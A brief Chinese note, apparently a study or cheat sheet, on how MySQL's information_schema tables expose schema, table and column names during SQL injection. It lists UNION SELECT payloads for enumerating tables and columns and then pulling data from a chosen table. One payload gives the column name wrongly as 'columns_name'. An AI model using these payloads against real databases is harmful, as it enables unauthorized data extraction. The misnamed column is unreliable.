在mysql较高版本上有一个自带的数据库information_schema记录数据库所有表，字段的信息。

1. 表信息：information_schema.tables表中有列：table_schema,table_name
2. 字段信息：information_schema.columns表中有列：table_schema,table_name,columns_name
3. 如果注入无限制的情况下，union select table_name,table_schema from information_schema.tables(或者columns)
4. union select columns_name from information_schema.columns where table_name=‘xxx‘ and table_schema=‘xxx‘
5. union select ‘xxx‘ from ‘你查的表名‘